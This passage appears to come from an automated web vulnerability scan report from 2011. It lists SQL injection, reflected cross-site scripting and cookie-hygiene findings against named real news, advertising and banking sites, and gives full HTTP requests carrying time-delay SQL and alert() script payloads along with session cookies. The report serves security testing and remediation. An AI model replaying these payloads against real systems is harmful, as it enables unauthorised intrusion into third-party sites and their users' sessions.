2.221. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 4]

2.222. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 5]

2.223. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 5]

2.224. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 2]

2.225. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 2]

2.226. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 2]

2.227. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 3]

2.228. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 3]

2.229. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 4]

2.230. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 4]

2.231. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 5]

2.232. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 5]

2.233. http://ib.adnxs.com/ab [ccd parameter]

2.234. http://img.mediaplex.com/cgi-bin/html/0/711/53200/468x60_bk_hotbrands_8aBlueRNO.js [mpck parameter]

2.235. http://img.mediaplex.com/cgi-bin/html/0/711/53200/468x60_bk_hotbrands_8aBlueRNO.js [mpvc parameter]

2.236. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [imp_rvr_id parameter]

2.237. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [imp_rvr_id parameter]

2.238. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpck parameter]

2.239. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [mpvc parameter]

2.240. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

2.241. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

2.242. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

2.243. http://jlinks.industrybrains.com/jsct [ct parameter]

2.244. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

2.245. http://jlinks.industrybrains.com/jsct [tr parameter]

2.246. http://link.undertone.com/st [name of an arbitrarily supplied request parameter]

2.247. http://pglb.buzzfed.com/36696/3257d75f8c2757d32e8a0463830be2e6 [callback parameter]

2.248. http://pglb.buzzfed.com/36696/fedb6e8b45a69fe2d76a00bd07b06405 [callback parameter]

2.249. http://rbc.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]

2.250. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

2.251. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

2.252. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

2.253. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

2.254. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

2.255. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

2.256. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

2.257. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

2.258. http://wd.sharethis.com/api/getCount2.php [cb parameter]

2.259. http://www.checksitetraffic.com/traffic_spy/xss.cx [REST URL parameter 2]

2.260. http://www.checksitetraffic.com/traffic_spy/ziddu.com [REST URL parameter 2]

2.261. https://www.nbc.ca/WebInfoWeb/DispatchRequest [lang parameter]

2.262. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [batchId parameter]

2.263. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-id parameter]

2.264. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-methodName parameter]

2.265. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-scriptName parameter]

2.266. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [callCount parameter]

2.267. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 2]

2.268. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 3]

2.269. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 4]

2.270. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 5]

2.271. http://www.nypost.com/r/SysConfig/WebPortal/nypost/images/favicon.ico [REST URL parameter 6]

2.272. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 2]

2.273. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 3]

2.274. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 4]

2.275. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 5]

2.276. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 6]

2.277. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 7]

2.278. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg [REST URL parameter 8]

2.279. http://www.rbcroyalbank.com/products/deposits/index.html [name of an arbitrarily supplied request parameter]

2.280. http://www.rbcroyalbank.com/products/deposits/index.html [tab parameter]

2.281. http://www.rbcroyalbank.com/products/deposits/youth-student-banking.html [name of an arbitrarily supplied request parameter]

2.282. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5 [partner parameter]

2.283. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5 [stylesheet parameter]

3. Cookie without HttpOnly flag set

3.1. https://easywebsoc.tdcanadatrust.com/servlet/ca.tdbank.banking.servlet.DefaultServlet

3.2. http://as.vs4entertainment.com/ERA/ResourceHandler.ashx

3.3. http://as.vs4entertainment.com/ERALinks/Default.aspx

3.4. http://b.scorecardresearch.com/b

3.5. http://b.scorecardresearch.com/p

3.6. http://b.scorecardresearch.com/r

3.7. http://bid.openx.net/json

3.8. http://imp.fetchback.com/serve/fb/adtag.js

3.9. http://imp.fetchback.com/serve/fb/imp

3.10. http://rbc.bridgetrack.com/a/s/

3.11. http://rbc.bridgetrack.com/event/

3.12. http://rbc.bridgetrack.com/track/

3.13. http://tag.contextweb.com/TagPublish/GetAd.aspx

3.14. http://tag.contextweb.com/TagPublish/GetAd.aspx

3.15. http://tag.contextweb.com/TagPublish/GetAd.aspx

3.16. http://tag.contextweb.com/TagPublish/GetAd.aspx

3.17. http://www.nydailynews.com/favicon.ico

3.18. http://www.nydailynews.com/gossip/index.html

3.19. http://www.nydailynews.com/img/static/covers/backpage_cover.jpg

3.20. http://www.nydailynews.com/img/static/covers/frontpage_cover.jpg

3.21. http://www.nydailynews.com/img/static/twitter/twitter_footer.jpg

3.22. http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html

3.23. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

3.24. http://www.nydailynews.com/nydn/dwr/engine.js

3.25. http://www.nydailynews.com/nydn/dwr/interface/mostEmailedStories.js

3.26. http://www.nydailynews.com/nydn/dwr/interface/mostPopularStories.js

3.27. http://www.nydailynews.com/nydn/dwr/util.js

4. Password field with autocomplete enabled

4.1. https://hackalert.armorize.com/login.php

4.2. https://hackalert.armorize.com/register.php

5. Source code disclosure

6. Cross-domain POST

7. Cookie scoped to parent domain

7.1. http://b.scorecardresearch.com/b

7.2. http://b.scorecardresearch.com/p

7.3. http://b.scorecardresearch.com/r

7.4. http://bid.openx.net/json

7.5. http://imp.fetchback.com/serve/fb/adtag.js

7.6. http://imp.fetchback.com/serve/fb/imp

7.7. http://tag.contextweb.com/TagPublish/GetAd.aspx

7.8. http://tag.contextweb.com/TagPublish/GetAd.aspx

7.9. http://tag.contextweb.com/TagPublish/GetAd.aspx

7.10. http://tag.contextweb.com/TagPublish/GetAd.aspx

8. Cross-domain Referer leakage

8.1. http://ib.adnxs.com/ab

8.2. http://www.rbcroyalbank.com/products/deposits/index.html

8.3. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5

9. Cross-domain script include

9.1. http://www.checksitetraffic.com/

9.2. http://www.checksitetraffic.com/traffic_spy/xss.cx

9.3. http://www.checksitetraffic.com/traffic_spy/ziddu.com

9.4. http://www.nydailynews.com/gossip/index.html

9.5. http://www.nydailynews.com/index.html

9.6. http://www.nydailynews.com/news/ny_crime/2011/09/26/2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html

9.7. http://www.nydailynews.com/static/img/bg-button.png

9.8. http://www.nypost.com/

9.9. http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J

9.10. http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN

9.11. http://www.nypost.com/pagesix

10. Email addresses disclosed

10.1. https://hackalert.armorize.com/_js/rich_calendar.js

10.2. http://wd.sharethis.com/button/buttons.js

10.3. http://www.checksitetraffic.com/traffic_spy/xss.cx

10.4. http://www.checksitetraffic.com/traffic_spy/ziddu.com

10.5. https://www.nbc.ca/WebInfoWebFiles/wi/common/include/css-js/Utils.js

10.6. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_gallery/video_list/video_list.css

10.7. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

10.8. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/css/pagesix.css

10.9. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/pagesix_logo/pagesix_logo.css

10.10. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_pagesix/top_story/top_story.css

10.11. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

10.12. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

10.13. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/markets/markets.css

10.14. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/polls/polls.css

10.15. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/post_pics/post_pics.css

10.16. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.css

10.17. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_default.css

10.18. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/top_story/top_story_wide.css

10.19. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/css/home_default.css

10.20. http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J

10.21. http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN

10.22. http://www.nypost.com/pagesix

10.23. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events.css

10.24. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/events/events_home.css

10.25. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/local/local.css

10.26. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/lotto/lotto.js

10.27. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_news/transit/transit.css

10.28. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.js

10.29. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js

10.30. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js

10.31. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/post_ten/post_ten.css

10.32. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_blocks/section_blocks.js

10.33. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/section_tables/section_tables.js

10.34. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js

10.35. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

10.36. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/block_functions.js

10.37. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/facebox/facebox.js

10.38. http://www.nypost.com/r/SysConfig/WebPortal/nypost/scripts/jquery.dimensions.js

10.39. http://www.rbcroyalbank.com/uos/_assets/js/utilities.js

11. Cacheable HTTPS response

11.1. https://easywebsoc.tdcanadatrust.com/favicon.ico

11.2. https://hackalert.armorize.com/_js/ajaxInterface.js

11.3. https://hackalert.armorize.com/_js/datepicker.js

11.4. https://hackalert.armorize.com/_js/doFx.js

11.5. https://hackalert.armorize.com/_js/dom-drag.js

11.6. https://hackalert.armorize.com/_js/mootools.v1.11.js

11.7. https://hackalert.armorize.com/_js/rc_lang_en.js

11.8. https://hackalert.armorize.com/_js/register.js

11.9. https://hackalert.armorize.com/_js/rich_calendar.js

11.10. https://hackalert.armorize.com/_js/tooltips.js

11.11. https://hackalert.armorize.com/_js/usersettings.js

11.12. https://hackalert.armorize.com/_js/windowFx.js

11.13. https://www.nbc.ca/WebInfoWeb/DispatchRequest

12. HTML does not specify charset

12.1. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90

12.2. http://display.digitalriver.com/

12.3. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23

12.4. http://wd.sharethis.com/api/getCount2.php

12.5. http://www.rbcroyalbank.com/_assets-custom/js/ajax_utils.js

13. Content type incorrectly stated

13.1. http://display.digitalriver.com/

13.2. https://easywebsoc.tdcanadatrust.com/favicon.ico

13.3. http://events.nydailynews.com/partner_json/search

13.4. http://imp.fetchback.com/serve/fb/adtag.js

13.5. http://pglb.buzzfed.com/36696/3257d75f8c2757d32e8a0463830be2e6

13.6. http://pglb.buzzfed.com/36696/fedb6e8b45a69fe2d76a00bd07b06405

13.7. http://wd.sharethis.com/api/getCount2.php

13.8. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/cadre_haut_back_gau.png

13.9. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_bas_back.png

13.10. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_bas_dr.png

13.11. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_bas_gau.png

13.12. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_haut_dr.png

13.13. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_coin_haut_gau.png

13.14. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_haut_back.png

13.15. https://www.nbc.ca/WebInfoWebFiles/wi/calculator/OrderCreditCard/img/contenu_haut_back_dr.png

13.16. https://www.nbc.ca/bnc/files/bnc10025/en/2/platinumbusiness_en.gif

13.17. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

13.18. http://www.nydailynews.com/nydn/dwr/interface/mostEmailedStories.js

13.19. http://www.nydailynews.com/nydn/dwr/interface/mostPopularStories.js

13.20. http://www.nypost.com/Fragment/SysConfig/WebPortal/nypost/blocks/hot_topics/hot_topics_bar.jsp

13.21. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htm

13.22. http://www.nypost.com/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg

14. Content type is not specified



1. SQL injection  next
There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the name of an arbitrarily supplied request parameter. The application took 45721 milliseconds to respond to the request, compared with 28377 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js?1')waitfor%20delay'0%3a0%3a20'--=1 HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1; __utma=185806841.591003776.1317070246.1317070246.1317070246.1; __utmb=185806841.5.10.1317070246; __utmc=185806841; __utmz=185806841.1317070246.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 22:12:32 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...

1.2. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 2. The application took 81191 milliseconds to respond to the request, compared with 15833 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C'waitfor%20delay'0%3a0%3a20'--/images/icons/user.png HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E25a9cf2398e
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1; __utma=185806841.591003776.1317070246.1317070246.1317070246.1; __utmb=185806841.5.10.1317070246; __utmc=185806841; __utmz=185806841.1317070246.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 23:27:07 GMT
Server: Apache/2.2.13 (Linux/SUSE)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 153952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=7">
   <meta h
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 283 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d6ab1<script>alert(1)</script>2ccfdbdb3d2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Fwww.checksitetraffic.com%2Ftraffic_spy%2Fziddu.com&callback=_ate.cbs.sc_httpwwwchecksitetrafficcomtrafficspyzidducom85d6ab1<script>alert(1)</script>2ccfdbdb3d2 HTTP/1.1
Host: api-public.addthis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.checksitetraffic.com/traffic_spy/ziddu.com
Cookie: uid=0000000000000000; uvc=16|38,19|39

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Mon, 26 Sep 2011 21:10:06 GMT
Content-Length: 114
Connection: close

_ate.cbs.sc_httpwwwchecksitetrafficcomtrafficspyzidducom85d6ab1<script>alert(1)</script>2ccfdbdb3d2({"shares":0});

2.2. http://as.vs4entertainment.com/ERA/era_rl.aspx [blockid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.vs4entertainment.com
Path:   /ERA/era_rl.aspx

Issue detail

The value of the blockid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0b25'%3balert(1)//90c97205e4 was submitted in the blockid parameter. This input was echoed as f0b25';alert(1)//90c97205e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ERA/era_rl.aspx?elid=ERA_AD_BLOCK&eradomain=as.vs4entertainment.com&pubid=nypost&blockid=%2Fnews-story-300x225f0b25'%3balert(1)//90c97205e4 HTTP/1.1
Host: as.vs4entertainment.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 27 Sep 2011 13:23:08 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ERA_C2=0461e5da-f74e-42ca-9249-0860b2dee4e4; expires=Tue, 27-Sep-2011 13:53:08 GMT; path=/
Vary: Accept-Encoding
Content-Length: 7553

var ERA_RC=window.ERA_RC||{script_element_id:'era_rc_script'};ERA_RC.resource=function(){var $={};return{init:function(){var params={blockid:'/news-story-300x225f0b25';alert(1)//90c97205e4',elid:'ERA_AD_BLOCK',eradomain:'as.vs4entertainment.com',pubid:'nypost'};var elname="ERA_RC"
var blockID=ERA_RC.resource.getParam(params,"BlockID");if(blockID!=null)
blockID="_"+blockID.replace(/[^-\w
...[SNIP]...

2.3. http://as.vs4entertainment.com/ERA/era_rl.aspx [elid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.vs4entertainment.com
Path:   /ERA/era_rl.aspx

Issue detail

The value of the elid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 412f4'%3balert(1)//badb9c1958 was submitted in the elid parameter. This input was echoed as 412f4';alert(1)//badb9c1958 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ERA/era_rl.aspx?elid=ERA_AD_BLOCK412f4'%3balert(1)//badb9c1958&eradomain=as.vs4entertainment.com&pubid=nypost&blockid=%2Fnews-story-300x225 HTTP/1.1
Host: as.vs4entertainment.com
Proxy-Connection: keep-alive
